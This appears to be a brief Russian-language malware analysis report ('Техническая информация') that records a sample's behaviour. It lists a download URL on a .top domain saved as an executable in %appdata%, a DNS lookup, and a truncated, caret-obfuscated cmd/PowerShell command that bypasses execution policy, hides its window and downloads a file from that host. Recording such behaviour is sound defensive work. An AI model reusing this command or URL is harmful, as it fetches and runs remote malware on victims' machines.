Техническая информация
- http://folueopa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwERs^hell.eXe ^-e^X^EC^uTIoNp^OlIcY^ ^bYpaSS^ -n^oP^RofILe ^-wiNDowSTYl^e hI^Dd^en^ (NEW-^oB^j^eCT^ sY^S^t^e^m.^neT^.wE^Bcl^IE^N^T).d^own^lo^Ad^fi^L^e('http://folueo...
- DNS ASK fo###opa.top
- '<SYSTEM32>\cmd.exe' /C "pOwERs^hell.eXe ^-e^X^EC^uTIoNp^OlIcY^ ^bYpaSS^ -n^oP^RofILe ^-wiNDowSTYl^e hI^Dd^en^ (NEW-^oB^j^eCT^ sY^S^t^e^m.^neT^.wE^Bcl^IE^N^T).d^own^lo^Ad^fi^L^e('http://folueo...' (со скрытым окном)